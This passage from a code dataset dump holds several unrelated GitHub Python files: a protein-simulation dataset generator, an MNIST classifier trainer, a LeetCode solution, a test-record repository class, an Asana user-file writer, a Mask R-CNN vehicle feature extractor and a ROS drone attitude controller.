Reason: %s' % (file_path, e))\n\nn_proteins=[20,50,100,200,500,1000,2000,5000,10000];\n#n_proteins=[20000];\n\npath_datasets=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"/data/\"\npath_datasets_norm=path_datasets+\"NormDatasets/\"\npath_datasets_long=path_datasets+\"LongDatasets/\"\npath_datasets_common_files= path_datasets +\"common/\"\nprot_fasta=path_datasets_common_files+\"UP000005640_9606.fasta\"\nseq_params_path= path_datasets_common_files + \"seq-params.json\"\n\nn_reads_norm=100000;\nn_reads_long=1000000;\n\n\nif not os.path.isdir(path_datasets_norm):\n os.mkdir(path_datasets_norm)\nif not os.path.isdir(path_datasets_long):\n os.mkdir(path_datasets_long)\n\n##Generate norm datasets\n\"\"\"\nfor n in n_proteins:\n protein_folder=path_datasets_norm+str(n)+\"Prot/\"\n if not os.path.isdir(protein_folder): ##If folder doesnt exist\n os.mkdir(protein_folder)\n \n cleave_proteins(prot_fasta,protein_folder+\"peptides.csv\",\"trypsin\",n=n)\n dye_seqs_path=protein_folder+\"dye-seqs.tsv\";\n dye_seqs_from_peptides(protein_folder+\"peptides.csv\",\n ['DE','C','Y'],\n dye_seqs_path)\n dye_tracks_path=protein_folder+\"dye-tracks.tsv\";\n radiometries_path=protein_folder+\"radiometries.tsv\";\n true_ids_path=protein_folder+\"true-ids.tsv\";\n cmd_gen_dye_tracks = \"./bin/whatprot simulate dt -t 10 -g 1000 -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -T \" +dye_tracks_path;\n \n cmd_sim_rad = \"./bin/whatprot simulate rad -t 10 -g \"+str(n_reads_norm)+\" -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -R \" + radiometries_path + \" -Y \"+ true_ids_path \n \n subprocess.run(cmd_sim_rad, shell=True, check=True)\n subprocess.run(cmd_gen_dye_tracks, shell=True, check=True)\n #subprocess.run(cmd_sim_rad)\n\n\"\"\"\n\n#Generate long datasets:\nn_proteins_long=1000\nprotein_folder=path_datasets_long+str(n_proteins_long)+\"Prot/\"\nif not os.path.isdir(protein_folder): ##If folder doesnt exist\n os.mkdir(protein_folder)\n\ncleave_proteins(prot_fasta,protein_folder+\"peptides.csv\",\"trypsin\",n=n_proteins_long)\ndye_seqs_path=protein_folder+\"dye-seqs.tsv\";\ndye_seqs_from_peptides(protein_folder+\"peptides.csv\",\n ['DE','C','Y'],\n dye_seqs_path)\ndye_tracks_path=protein_folder+\"dye-tracks.tsv\";\nradiometries_path=protein_folder+\"radiometries.tsv\";\ntrue_ids_path=protein_folder+\"true-ids.tsv\";\ncmd_gen_dye_tracks = \"./bin/whatprot simulate dt -t 10 -g 1000 -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -T \" +dye_tracks_path;\n\ncmd_sim_rad = \"./bin/whatprot simulate rad -t 10 -g \"+str(n_reads_long)+\" -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -R \" + radiometries_path + \" -Y \"+ true_ids_path \n\nsubprocess.run(cmd_sim_rad, shell=True, check=True)\nsubprocess.run(cmd_gen_dye_tracks, shell=True, check=True)\n\n","repo_name":"JavierKipen/probeam","sub_path":"scripts/DatasetGen.py","file_name":"DatasetGen.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"31142190643","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\n# Load MNIST\nmnist = keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Preprocess\nx_train = x_train / 255.0\nx_test = x_test / 255.0\n\n# Define\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(256, activation='relu'),\n 
keras.layers.Dropout(0.2),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dropout(0.2),\n keras.layers.Dense(64, activation='relu'),\n keras.layers.Dropout(0.2),\n keras.layers.Dense(10, activation='softmax')\n])\n\n# Compile\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),\n metrics=['accuracy'])\n\n# Data augmentation\ndatagen = keras.preprocessing.image.ImageDataGenerator(\n rotation_range=10,\n zoom_range=0.1,\n width_shift_range=0.1,\n height_shift_range=0.1\n)\n\ndatagen.fit(x_train[..., np.newaxis])\n\n# Callback\nearly_stopping = keras.callbacks.EarlyStopping(patience=5, restore_best_weights=True)\nmodel_checkpoint = keras.callbacks.ModelCheckpoint(\"mnist_best_model.h5\", save_best_only=True)\n\n# Train model\nhistory = model.fit(datagen.flow(x_train[..., np.newaxis], y_train, batch_size=32),\n epochs=50, validation_data=(x_test[..., np.newaxis], y_test),\n callbacks=[early_stopping, model_checkpoint])\n\n# Evaluation model\ntest_loss, test_acc = model.evaluate(x_test[..., np.newaxis], y_test, verbose=2)\nprint('Test accuracy:', test_acc)\n\n# Load saved model\nloaded_model = keras.models.load_model(\"mnist_best_model.h5\")\n\n#predictions w/ loaded model\npredictions = loaded_model.predict(x_test[..., np.newaxis])\npredicted_classes = np.argmax(predictions, axis=1)\n\n# Display confusion matrix\nconf_mat = confusion_matrix(y_test, predicted_classes)\nprint(\"Confusion Matrix:\")\nprint(conf_mat)\n\n# Plot\nplt.matshow(conf_mat, cmap=plt.cm.gray)\nplt.xlabel(\"Predicted labels\")\nplt.ylabel(\"True labels\")\nplt.show()\n","repo_name":"Haydens-workshop/Training-model","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"29886323735","text":"from leetcode import ListNode\r\n\r\nclass Solution:\r\n\tdef removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\r\n\t\tnil = ListNode(0)\r\n\t\tnil.next = head\r\n\r\n\t\tdef dfs(prev, cur):\r\n\t\t\tif cur is None:\r\n\t\t\t\treturn 1\r\n\t\t\tidx = dfs(cur, cur.next)\r\n\t\t\tprint(cur.val, idx)\r\n\t\t\tif idx == n:\r\n\t\t\t\tprev.next = cur.next\r\n\t\t\treturn idx + 1\r\n\r\n\t\tdfs(nil, head)\r\n\t\treturn nil.next\r\n","repo_name":"linsinn/algorithms","sub_path":"others/src/leetcode/lc19.py","file_name":"lc19.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"35979846234","text":"import logging\n\nfrom testtools.testresult.real import (\n FINAL_STATES,\n STATES,\n)\n\nfrom obsub import event\n\nfrom testconsole.testtools import (\n INPROGRESS,\n EXISTS,\n)\n\n\nclass Repository(object):\n \"\"\"Hold information about a collection of test records.\"\"\"\n\n def __init__(self):\n self._index = {}\n self._counts = {state: 0 for state in STATES - {None}}\n\n def get_record(self, test_id):\n \"\"\"Return the test case with the given ID.\"\"\"\n return self._index.get(test_id)\n\n def add_record(self, record):\n \"\"\"Add a new test record to the repository.\n\n If a test record with the same ID already exists, it will be silently\n overwritten.\n \"\"\"\n logging.debug(\"Add test record '%s'\", record.id)\n if record.id in self._index and record.runnable:\n logging.warning(\n \"Runnable test record '%s' exists, skipping it\", record.id)\n return\n self.update_record(record)\n\n def update_record(self, record):\n 
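The removeNthFromEnd above recurses to the tail and leaves a debug print in the hot path; the classic iterative two-pointer variant uses O(1) extra space. A sketch against the same ListNode interface the snippet imports:

from leetcode import ListNode  # same helper module the snippet uses

def remove_nth_from_end(head: ListNode, n: int) -> ListNode:
    # Advance `fast` n nodes ahead, then move both pointers until `fast`
    # reaches the tail; `slow` then sits just before the node to unlink.
    nil = ListNode(0)
    nil.next = head
    fast = slow = nil
    for _ in range(n):
        fast = fast.next
    while fast.next:
        fast = fast.next
        slow = slow.next
    slow.next = slow.next.next
    return nil.next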
\"\"\"Update the given record.\n\n :param record: A TestRecord that already exists in the repository.\n \"\"\"\n # TODO: The code below assumes that the packets in the subunit stream\n # are ordered in a deterministic and predictable way. E.g.:\n #\n # - the stream starts with a series of packets with status 'exists'\n # each one associate with a test that is going to be run.\n #\n # - then test records sequentially transition from 'exists' to\n # 'inprogress' and then a final status (each transition happens\n # only once and it's not interleaved with packets associated with\n # other test cases)\n #\n # - x-log and x-traceback packets have no status and have a test ID\n # that always matches the test ID of the currently 'inprogress' test\n # case.\n #\n # These assumption are consistent with subunit.v2.StreamResultToBytes\n # and with subunitlogging.SubunitLoggingSuite.\n #\n # However at some point we might want to be more defensive, introducing\n # logic to spot and possibly resolve inconsistencies.\n self._index[record.id] = record\n\n if record.status:\n if record.status not in STATES:\n logging.warning(\"Unknown status '%s'\", record.status)\n return\n\n # Runnable records are associated with actual test cases, so we\n # want to update the counts (non runnable records are typically\n # associated with fixtures and resources).\n if record.runnable:\n previous_status = self._get_previous_status(record.status)\n if previous_status:\n self._counts[previous_status] -= 1\n assert self._counts[previous_status] >= 0\n self._counts[record.status] += 1\n self.on_counts_change()\n\n if record.status == INPROGRESS:\n logging.debug(\"Start: '%s'\", record.id)\n self.on_record_start(record)\n elif record.status in FINAL_STATES - {EXISTS}:\n logging.debug(\"Finish: '%s' -> '%s'\", record.id, record.status)\n\n elif record.details:\n logging.debug(\"Record '%s' has new progress data\", record.id)\n self.on_record_progress(record)\n\n def count_records(self, states=STATES):\n \"\"\"Return the number of runnable records in the given states.\n\n The default is to return the count of all runnable records (i.e. 
in\n all states).\n \"\"\"\n return sum([\n self._counts[state] for state in self._counts if state in states])\n\n @event\n def on_counts_change(self):\n \"\"\"Notifier triggering when status counts change.\"\"\"\n\n @event\n def on_record_start(self, record):\n \"\"\"Notifier triggering when a new test gets started.\"\"\"\n\n @event\n def on_record_progress(self, record):\n \"\"\"Notifier triggering when receiving all packets for a detail.\"\"\"\n\n def _get_previous_status(self, status):\n if status == EXISTS:\n return None\n elif status == INPROGRESS:\n return EXISTS\n elif status in FINAL_STATES - {EXISTS}:\n return INPROGRESS\n","repo_name":"freeekanayaka/testconsole","sub_path":"testconsole/model/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"27563492654","text":"import configparser\nimport json\nimport os\n\n\nclass User(object):\n parent = None\n api_base_url = None\n\n user_id = None\n\n def __init__(self, parent):\n config = configparser.ConfigParser()\n config.read(\"main.ini\")\n\n self.global_config = {s: dict(config.items(s)) for s in config.sections()}\n\n self.parent = parent\n\n def get_me(self):\n return self.parent.client.users.me()\n\n def write_user_file(self):\n if \"api.\"+self.parent.requests_api.provider_name+\".Files\" in self.global_config.keys():\n file_basepath = self.global_config[\"api.\" + self.parent.requests_api.provider_name][\"file_basepath\"]\n me_file = self.global_config[\"api.\"+self.parent.requests_api.provider_name+\".Files\"][\"user\"]\n target_filepath = os.path.join(os.getcwd(), file_basepath, \"user_\"+str(self.user_id), me_file)\n\n if os.path.isdir(os.path.dirname(target_filepath)):\n data_ = json.dumps(self.parent.user.to_json(), indent=4)\n if not os.path.isfile(target_filepath):\n with open(target_filepath, \"w\", encoding=\"utf-8\") as me_json_f:\n me_json_f.write(data_)\n me_json_f.close()\n else:\n\n with open(target_filepath, encoding=\"utf-8\") as me_json_read:\n if me_json_read.read().strip() != data_.strip():\n with open(target_filepath, \"w\",\n encoding=\"utf-8\") as me_json_f:\n me_json_f.write(json.dumps(self.parent.user.workspaces, indent=4))\n me_json_f.close()\n else:\n print(\"no change: \" + me_file)\n me_json_read.close()\n","repo_name":"Izzy3110/python3-asana-api","sub_path":"wyl/api/asana/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"40631262362","text":"import os\nimport torch\nimport numpy as np\nimport torch.utils.data\nfrom PIL import Image\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport cv2\nimport math\nimport glob\nimport pickle\nclass_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 
'carrot', 'hot dog', 'pizza',\n               'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n               'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n               'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n               'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n               'teddy bear', 'hair drier', 'toothbrush']\ncolors=[[np.random.randint(0,255),np.random.randint(0,255),np.random.randint(0,255)]for i in range(100)]\n# For a clearly visible final instance segmentation, assign fixed dark colors to the common classes\ncolors[3]=[0,0,255] #car\ncolors[6]=[0,0,255] #bus\ncolors[8]=[0,0,255] #truck\n\nclass_need = ['car','truck', 'bus']\n\ndef compute_distance(center0, center1):\n    return math.sqrt(math.pow((center1[0]-center0[0]),2) + math.pow((center1[1]-center0[1]),2))\n\ndef demo():\n    img_dir='/data4/mjx/gd/datasets'\n    test_dir = '/data4/mjx/gd/dataset_raw/test/'\n    # load an instance segmentation model pre-trained on COCO\n    device = torch.device('cuda:2')\n    model = torchvision.models.detection.maskrcnn_resnet50_fpn()\n    state_dict = torch.load('maskrcnn_resnet50_fpn_coco-bf2d0c1e.pth')\n    model.load_state_dict(state_dict)\n    model.to(device)\n    # imgs=os.listdir(img_dir)\n    imgs = glob.glob(test_dir+'/*/*')\n    \n    all_info = {}\n\n    for pic_idx in range(len(imgs)):\n        \n        img_info = {}\n        img_info['box_0_min'], img_info['box_1_min'], img_info['box_2_max'], img_info['box_3_max'] = {}, {}, {}, {}\n        \n        img_info['car_num'] = {}\n        img_info['box_center_gap_mean'] = {}\n        img_info['box_center_gap_max'] = {}\n        img_info['box_center_gap_min'] = {}\n        img_info['box_center_gap_std'] = {}\n        img_info['box_center_gap_range'] = {}\n\n        img_info['last_distance'] = {}\n\n        img_info['mask_area_mean'] = {}\n        img_info['mask_area_max'] = {}\n        img_info['mask_area_min'] = {}\n        img_info['mask_area_std'] = {}\n        img_info['mask_area_range'] = {}\n        img_info['mask_area_all'] = {}\n        img_info['mask_road'] = {}\n\n        distance = []\n        box_0, box_1, box_2, box_3 = [], [], [], []\n        box_center = []\n        mask_area = []\n        car_num_temp = 0\n        imgsrc=cv2.imread(imgs[pic_idx])\n        all_cls_mask_color = np.zeros_like(imgsrc)\n        all_cls_mask_index=np.zeros_like(imgsrc)\n        h,w,c = imgsrc.shape\n        img = imgsrc / 255.\n        img=np.transpose(img, (2, 0, 1))\n        img=torch.tensor(img,dtype=torch.float)\n        # put the model in evaluation mode\n        model.eval()\n        \n        with torch.no_grad():\n            prediction = model([img.to(device)])\n        # print(prediction)\n        \n        scores =prediction[0]['scores']\n        for idx,score in enumerate(scores):\n            mask=prediction[0]['masks'][idx][0].cpu().numpy()\n            mask=mask>0.5\n            cls_id=prediction[0]['labels'][idx].item()\n            mask_size = (all_cls_mask_index[mask]==1).size\n            boxes =prediction[0]['boxes'][idx].cpu().numpy()\n            if score > 0.5 and cls_id < 81 \\\n                and class_names[cls_id] in class_need \\\n                and mask_size < 100000 \\\n                and boxes[0] > 0.2 * w:\n                car_num_temp += 1\n                mask_area.append(mask_size)\n                box_0.append(boxes[0])\n                box_1.append(boxes[1])\n                box_2.append(boxes[2])\n                box_3.append(boxes[3])\n                box_center.append(((boxes[0]+boxes[2])/2, (boxes[1]+boxes[3])/2))\n            # labels =prediction[0]['labels']\n            # all_cls_mask_color[mask]=colors[cls_id]\n            # all_cls_mask_index[mask]=1\n            \n            # cv2.rectangle(imgsrc, (boxes[0], boxes[1]), (boxes[2], boxes[3]), (255, 0, 0), 1)\n            # cv2.putText(imgsrc, class_names[cls_id], (int(boxes[0]),int(boxes[1]-10)), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), 1)\n        \n        img_name = imgs[pic_idx].split('/')[-1]\n        \n        img_info['box_0_min'] = min(box_0) if box_0 else 0\n        img_info['box_1_min'] = min(box_1) if box_1 else 0\n        img_info['box_2_max'] = max(box_2) if box_2 else 0\n        img_info['box_3_max'] = max(box_3) if box_3 else 0\n        
img_info['last_distance'] = h - max(box_3) if box_3 else 0\n img_info['car_num'] = car_num_temp\n for i in range(len(box_center)):\n for j in range(i+1, len(box_center)):\n distance.append(compute_distance(box_center[i], box_center[j]))\n \n img_info['box_center_gap_min'] = min(distance) if distance else 0\n img_info['box_center_gap_max'] = max(distance) if distance else 0\n img_info['box_center_gap_mean'] = np.mean(distance) if distance else 0\n img_info['box_center_gap_std'] = np.std(distance) if distance else 0\n img_info['box_center_gap_range'] = max(distance) - min(distance) if distance else 0\n \n\n img_info['mask_area_max'] = max(mask_area) if mask_area else 0\n img_info['mask_area_min'] = min(mask_area) if mask_area else 0\n img_info['mask_area_mean'] = np.mean(mask_area) if mask_area else 0\n img_info['mask_area_std'] = np.std(mask_area) if mask_area else 0\n img_info['mask_area_range'] = max(mask_area) - min(mask_area) if mask_area else 0\n img_info['mask_area_all'] = sum(mask_area) if mask_area else 0\n img_info['mask_road'] = (w*h/2) - sum(mask_area) if mask_area else 0\n\n all_info[img_name] = img_info\n \n with open('test_dection_info.pkl', 'wb') as f:\n pickle.dump(all_info, f)\n\n\n # img_weight=cv2.addWeighted(imgsrc,0.4,all_cls_mask_color,0.6,0)#线性混合\n # all_mask=all_cls_mask_index==1\n # result=np.copy(imgsrc)\n # result[all_mask]=img_weight[all_mask] #只取mask的混合部分\n # union = np.concatenate((imgsrc,result),axis=1)\n # cv2.imwrite(os.path.join('./seg_res',img_name),result)\n # print(box_0_min, box_1_min, box_2_max, box_3_max)\n # break\n\ndemo()\n","repo_name":"majx1997/GD-final","sub_path":"script/seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"32453366586","text":"#!/usr/bin/env python\n\nimport rospy\nimport numpy\nimport math\n\nfrom geometry_msgs.msg import PoseStamped, Vector3\nfrom mavros_msgs.msg import State, AttitudeTarget\nfrom clever.srv import Navigate\nfrom mavros_msgs.srv import CommandBool, SetMode\nfrom std_srvs.srv import Trigger\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion, euler_matrix\n\nfrom threading import Lock\n\n#--- parameters --#\n\nrospy.init_node('rps_offboard')\nrospy.loginfo('initializing rps_offboard...')\n\nlock = Lock()\nAT = AttitudeTarget\nland_timeout = 2\n\ncoeffs = {}\ncoeffs['thrust_0'] = float(rospy.get_param('~thrust_0'))\ncoeffs['thrust_D'] = float(rospy.get_param('~thrust_D'))\ncoeffs['thrust_P'] = float(rospy.get_param('~thrust_P'))\ncoeffs['thrust_I'] = float(rospy.get_param('~thrust_I'))\ncoeffs['pitch_0'] = float(rospy.get_param('~pitch_0'))\ncoeffs['pitch_D'] = float(rospy.get_param('~pitch_D')) \ncoeffs['pitch_P'] = float(rospy.get_param('~pitch_P'))\ncoeffs['pitch_I'] = float(rospy.get_param('~pitch_I'))\ncoeffs['pitch_max'] = float(rospy.get_param('~pitch_max'))\ncoeffs['roll_0'] = float(rospy.get_param('~roll_0'))\ncoeffs['roll_D'] = float(rospy.get_param('~roll_D'))\ncoeffs['roll_P'] = float(rospy.get_param('~roll_P'))\ncoeffs['roll_I'] = float(rospy.get_param('~roll_I'))\ncoeffs['roll_max'] = float(rospy.get_param('~roll_max'))\n\ncamera_angle = float(rospy.get_param('~camera_angle'))\ntakeoff_time = float(rospy.get_param('~takeoff_time'))\nhold_yaw = bool(rospy.get_param('~hold_yaw'))\n\n#--- functions ---#\n\n\ndef get_state(data):\n\tglobal state\n\tstate = data\n\n\ndef get_att(data):\n\tglobal att\n\tq = [0 for i in range(4)]\n\n\tq[0] = 
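The nested index loops in seg.py that fill `distance` enumerate unordered pairs of box centers by hand; itertools.combinations expresses the same computation directly. A small sketch with illustrative centers (math.dist requires Python 3.8+):

import math
from itertools import combinations

centers = [(10.0, 12.0), (40.0, 35.0), (22.0, 80.0)]  # illustrative box centers
# One Euclidean distance per unordered pair, matching the i < j double loop.
distances = [math.dist(a, b) for a, b in combinations(centers, 2)]
print(min(distances), max(distances), sum(distances) / len(distances))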
data.pose.orientation.x\n\tq[1] = data.pose.orientation.y\n\tq[2] = data.pose.orientation.z\n\tq[3] = data.pose.orientation.w\n\tatt = euler_from_quaternion(q)\n\n\ndef get_position(data):\n\tglobal pose, Ix, Iy, Iz, pose_list\n\n\tif data.header.frame_id != '':\n\t\tpose = [data.pose.position.x, data.pose.position.y, data.pose.position.z]\n\telse:\n\t\tpose = None\n\t\tpose_list = None\n\t\tIx, Iy, Iz = 0, 0, 0\n\n\ndef transform_frame(vec, att):\n\n\t# from 'main_camera' to 'fcu'\n\ta = camera_angle\n\tvec[0], vec[1], vec[2] = vec[1]*math.cos(a) + vec[2]*math.sin(a), -vec[0], vec[2]*math.cos(a) - vec[1]*math.sin(a)\n\n\t# from 'fcu' to 'fcu_horiz'\n\troll, pitch = att[0], att[1]\t\n\trmat = euler_matrix(roll, pitch, 0, 'rxyz')\n\trmat = rmat[0:3, 0:3]\n\tvec = numpy.array([[vec[0]],[vec[1]],[vec[2]]])\n\tvec = rmat.dot(vec)\n\n\treturn float(vec[0]), float(vec[1]), float(vec[2])\n\n\ndef get_PID(Px, Py, Pz):\n\tglobal pose_list, Ix, Iy, Iz\n\n\t# calculate P\n\tif pose_list is None:\n\t\tpose_list = [[Px, Py, Pz] for i in range(5)]\n\t\tPx_0, Py_0, Pz_0 = Px, Py, Pz\n\telse:\n\t\tpl = [pose_list[i + 1] for i in range(4)]\n\t\tpl = pl + [[Px, Py, Pz]]\n\t\tpose_list = pl\n\n\t\tsum_0 = [0, 0, 0]\n\t\tsum = [0, 0, 0]\n\t\tfor i in range(3):\n\t\t\tfor j in range(4):\n\t\t\t\tsum_0[i] += pl[j][i]\n\t\t\tfor j in range(1, 5):\n\t\t\t\tsum[i] += pl[j][i]\n\n\t\tPx_0, Py_0, Pz_0 = sum_0[0]/4, sum_0[1]/4, sum_0[2]/4\n\t\tPx, Py, Pz = sum[0]/4, sum[1]/4, sum[2]/4\n\n\t# calculate I\n\tIx += 0.01*Px\n\tIy += 0.01*Py\n\tIz += 0.01*Pz\n\n\t# calculate D\n\tDx, Dy, Dz = Px - Px_0, Py - Py_0, Pz - Pz_0\n\n\treturn Px, Py, Pz, Ix, Iy, Iz, Dx, Dy, Dz\n\n\ndef calculate_setpoint(att, pose, sp_pose, sp_yaw):\n\n\t# calculate PID in frame 'fcu_horiz'\n\n\tpose = list(pose)\n\tx, y, z = transform_frame(pose, att)\n\tsx, sy, sz = sp_pose[0], sp_pose[1], sp_pose[2]\n\n\tPx, Py, Pz, Ix, Iy, Iz, Dx, Dy, Dz = get_PID(x + sx, y + sy, z + sz)\t\n\tprint('Px = {0:.2f}, Py = {1:.2f}, Pz = {2:.2f}'.format(Px, Py, Pz))\n\n\t# calculate attitude\n\n\troll = coeffs['roll_0'] + Dy*coeffs['roll_D'] + Py*coeffs['roll_P'] + Iy*coeffs['roll_I']\n\tif abs(roll) > coeffs['roll_max']:\n\t\troll = math.copysign(coeffs['roll_max'], roll)\n\n\tpitch = coeffs['pitch_0'] - Dx*coeffs['pitch_D'] - Px*coeffs['pitch_P'] - Ix*coeffs['pitch_I']\n\tif abs(pitch) > coeffs['pitch_max']:\n\t\tpitch = math.copysign(coeffs['pitch_max'], pitch)\n\n\tif hold_yaw:\n\t\tyaw = sp_yaw\n\telse:\n\t\tyaw = att[2]\n\n\tprint('sp_yaw = {0:.2f} '.format(yaw))\n\tsp_att = [roll, pitch, yaw] # roll, pitch, yaw \n\n\t# calculate thrust\n\t\n\tsp_thrust = coeffs['thrust_0'] - Dz*coeffs['thrust_D'] - Pz*coeffs['thrust_P'] - Iz*coeffs['thrust_I']\n\tif sp_thrust < 0:\n\t\tsp_thrust = 0\n\tif sp_thrust > 1:\n\t\tsp_thrust = 1\n\tprint('roll = {0:.2f}, pitch = {1:.2f}, yaw = {2:.2f}, thrust = {3:.2f}'.format(roll, pitch, att[2], sp_thrust))\n\t\n\treturn sp_att, sp_thrust\n\n\ndef get_message(sp_att, sp_thrust):\n\n\tmsg = AttitudeTarget()\n\tmsg.header.stamp = rospy.get_rostime() \n\tmsg.type_mask = AT.IGNORE_ROLL_RATE + AT.IGNORE_PITCH_RATE + AT.IGNORE_YAW_RATE\n\n\tq = quaternion_from_euler(sp_att[0],sp_att[1],sp_att[2])\n\tmsg.orientation.x = q[0]\n\tmsg.orientation.y = q[1]\n\tmsg.orientation.z = q[2]\n\tmsg.orientation.w = q[3]\n\tmsg.thrust = sp_thrust\n\n\treturn msg\n\n\ndef offboard_and_arm(auto_arm):\n\tglobal state\n\n\t# switch mode to 'OFFBOARD'\n\tif state.mode != 'OFFBOARD':\n\t\trospy.sleep(0.2)\n\t\tset_mode(0, 
'OFFBOARD')\n\t\trospy.loginfo('Switch mode to \"OFFBOARD\"')\n\n\t# arming\n\tif (not state.armed) and (auto_arm):\n\t\tarming(True)\n\t\trospy.loginfo('Arming')\n\n#--- services ---#\n\ndef navigate(data):\n\tglobal att, pose, sp_pose, sp_yaw, takeoff_cnt\n\n\tif data.frame_id != 'fcu_horiz':\n\t\trospy.logwarn('sp_pose must be given in \"fcu_horiz\" ')\n\t\treturn {'message': 'sp_pose must be given in \"fcu_horiz\" '}\n\n\ttry:\n\t\twith lock:\n\t\t\tsp_pose = [data.x, data.y, data.z]\n\t\t\t\n\t\t\ttakeoff_cnt = 0\n\n\t\t\tsp_yaw = att[2]\n\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\tsp_thrust = coeffs['thrust_0'] \n\n\t\t\tmsg = get_message(sp_att, sp_thrust)\n\t\t\tatt_pub.publish(msg)\n\n\t\t\toffboard_and_arm(data.auto_arm)\n\n\t\trospy.loginfo('rps_offboard: navigate')\n\t\treturn {'success': True}\n\n\texcept Exception as e:\n\t\trospy.logerr(str(e))\n\t\treturn {'success': False, 'message': str(e)}\n\n\ndef land(data):\n\tglobal state, sp_pose, Ix, Iy, Iz\n\n\tland_cnt = 0\n\twhile (state.mode != 'AUTO.LAND') and (land_cnt < 10*land_timeout):\n\t\tset_mode(0,'AUTO.LAND')\n\t\trospy.sleep(0.1)\n\t\tland_cnt += 1\n\n\tif land_cnt == 10*land_timeout:\n\t\trospy.loginfo('\"AUTO.LAND\" timeout')\n\t\treturn {'success': False}\n\telse:\n\t\tIx, Iy, Iz = 0, 0, 0\n\t\tsp_pose = None\n\t\trospy.loginfo('Switch mode to \"AUTO.LAND\"')\n\t\treturn {'success': True}\n\n\ndef release(data):\n\tglobal sp_pose, Ix, Iy, Iz\n\n\tIx, Iy, Iz = 0, 0, 0\n\tsp_pose = None\n\trospy.loginfo('rps_offboard: release')\n\treturn {'success': True}\n\n#--- main loop ---#\n\ndef loop():\n\tglobal att, pose, sp_pose, sp_yaw, takeoff_cnt\n\tr = rospy.Rate(10)\n\n\twhile not rospy.is_shutdown():\n\t\tif not (sp_pose is None):\n\t\t\twith lock:\n\t\t\t\tif (pose is None):\n\t\t\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\t\t\tsp_thrust = coeffs['thrust_0']\n\t\t\t\t\tprint('no pose')\n\n\t\t\t\telif takeoff_cnt is None:\n\t\t\t\t\tsp_att, sp_thrust = calculate_setpoint(att, pose, sp_pose, sp_yaw)\n\t\t\t\telse:\n\t\t\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\t\t\tsp_thrust = coeffs['thrust_0']\n\n\t\t\t\t\tprint('taking off...')\n\t\t\t\t\ttakeoff_cnt += 1\n\t\t\t\t\tif takeoff_cnt >= takeoff_time*10:\n\t\t\t\t\t\ttakeoff_cnt = None\n\n\t\t\t\tmsg = get_message(sp_att, sp_thrust)\n\t\t\t\tatt_pub.publish(msg)\n\n\t\tr.sleep()\n\n#--- actions ---#\n\natt = [0, 0, 1.57]\npose = None \nsp_pose = None\nsp_yaw = 1.57\nstate = None\n\npose_list = None\nIx, Iy, Iz = 0, 0, 0 \ntakeoff_cnt = None\n\nstate_sub = rospy.Subscriber('/mavros/state', State, get_state)\npose_sub = rospy.Subscriber('/RPS/pose', PoseStamped, get_position)\natt_sub = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, get_att) \n\natt_pub = rospy.Publisher('/mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)\n\nset_mode = rospy.ServiceProxy('/mavros/set_mode', SetMode, persistent=True)\narming = rospy.ServiceProxy('/mavros/cmd/arming', CommandBool, persistent=True)\n\nrospy.Service('navigate', Navigate, navigate)\nrospy.Service('land', Trigger, land)\nrospy.Service('release', Trigger, release)\n\nrospy.loginfo('rps_offboard 